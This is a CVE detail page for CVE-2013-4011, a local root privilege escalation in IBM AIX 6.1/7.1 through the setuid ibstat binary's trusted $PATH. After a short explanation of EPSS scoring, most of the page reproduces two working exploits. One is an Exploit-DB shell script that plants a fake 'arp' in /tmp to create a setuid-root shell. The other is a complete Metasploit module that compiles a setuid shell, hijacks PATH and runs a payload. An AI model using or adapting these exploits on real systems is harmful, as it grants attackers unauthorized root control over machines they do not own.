CVE-2013-4011 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# Exploit-DB Note: Screenshot provided by exploit author # #!/bin/sh # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation # Date: 2013-09-24 # Exploit Author: Kristian Erik Hermansen <[email protected]> # Vendor Homepage: http://www.ibm.com # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02 # Tested on: IBM AIX 6.1 # CVE: CVE-2013-4011 echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m ' echo "[*] AIX root privilege escalation" echo "[*] Kristian Erik Hermansen" echo "[*] https://linkedin.com/in/kristianhermansen" echo " +++++?????????????~.:,.:+???????????++++ +++++???????????+...:.,.,.=??????????+++ +++???????????~.,:~=~:::..,.~?????????++ +++???????????:,~==++++==~,,.?????????++ +++???????????,:=+++++++=~:,,~????????++ ++++?????????+,~~=++++++=~:,,:????????++ +++++????????~,~===~=+~,,::,:+???????+++ ++++++???????=~===++~~~+,,~::???????++++ ++++++++?????=~=+++~~~:++=~:~+???+++++++ +++++++++????~~=+++~+=~===~~:+??++++++++ +++++++++?????~~=====~~==~:,:?++++++++++ ++++++++++????+~==:::::=~:,+??++++++++++ ++++++++++?????:~~=~~~~~::,??+++++++++++ ++++++++++?????=~:~===~,,,????++++++++++ ++++++++++???+:==~:,,.:~~..+??++++++++++ +++++++++++....==+===~~=~,...=?+++++++++ ++++++++,........~=====..........+++++++ +++++................................++= =+:....................................= " TMPDIR=/tmp TAINT=${TMPDIR}/arp RSHELL=${TMPDIR}/r00t-sh cat > ${TAINT} <<-! #!/bin/sh cp /bin/sh ${RSHELL} chown root ${RSHELL} chmod 4555 ${RSHELL} ! chmod 755 ${TAINT} PATH=.:${PATH} export PATH cd ${TMPDIR} /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null if [ -e ${RSHELL} ]; then echo "[+] Access granted. Don't be evil..." ${RSHELL} else echo "[-] Exploit failed. Try some 0day instead..." fi

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, "Name" => "ibstat $PATH Privilege Escalation", "Description" => %q{ This module exploits the trusted $PATH environment variable of the SUID binary "ibstat". }, "Author" => [ "Kristian Erik Hermansen", #original author "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module ], "References" => [ ["CVE", "2013-4011"], ["OSVDB", "95420"], ["BID", "61287"], ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"], ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"] ], "Platform" => ["unix"], "Arch" => ARCH_CMD, "Payload" => { "Compat" => { "PayloadType" => "cmd", "RequiredCmd" => "perl" } }, "Targets" => [ ["IBM AIX Version 6.1", {}], ["IBM AIX Version 7.1", {}] ], "DefaultTarget" => 1, "DisclosureDate" => "Sep 24 2013" )) register_options([ OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]) ], self.class) end def check find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null") if find_output.include?("ibstat") return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, "Target is not vulnerable.") else print_good("Target is vulnerable.") end root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}" arp_file = "#{datastore["WritableDir"]}/arp" c_file = %Q^#include <stdio.h> int main() { setreuid(0,0); setregid(0,0); execve("/bin/sh",NULL,NULL); return 0; } ^ arp = %Q^#!/bin/sh chown root #{root_file} chmod 4555 #{root_file} ^ if gcc_installed? print_status("Dropping file #{root_file}.c...") write_file("#{root_file}.c", c_file) print_status("Compiling source...") cmd_exec("gcc -o #{root_file} #{root_file}.c") print_status("Compilation completed") register_file_for_cleanup("#{root_file}.c") else cmd_exec("cp /bin/sh #{root_file}") end register_file_for_cleanup(root_file) print_status("Writing custom arp file...") write_file(arp_file,arp) register_file_for_cleanup(arp_file) cmd_exec("chmod 0555 #{arp_file}") print_status("Custom arp file written") print_status("Updating $PATH environment variable...") path_env = cmd_exec("echo $PATH") cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("export PATH") print_status("Triggering vulnerablity...") cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") # The $PATH variable must be restored before the payload is executed # in cases where an euid root shell was gained print_status("Restoring $PATH environment variable...") cmd_exec("PATH=#{path_env}") cmd_exec("export PATH") cmd_exec(root_file) print_status("Checking root privileges...") if is_root? print_status("Executing payload...") cmd_exec(payload.encoded) end end def gcc_installed? print_status("Checking if gcc exists...") gcc_whereis_output = cmd_exec("whereis -b gcc") if gcc_whereis_output.include?("/") print_good("gcc found!") return true end print_status("gcc not found. Using /bin/sh from local system") false end def is_root? id_output = cmd_exec("id") if id_output.include?("euid=0(root)") print_good("Got root! (euid)") return true end if id_output.include?("uid=0(root)") print_good("Got root!") return true end print_status("Exploit failed") false end end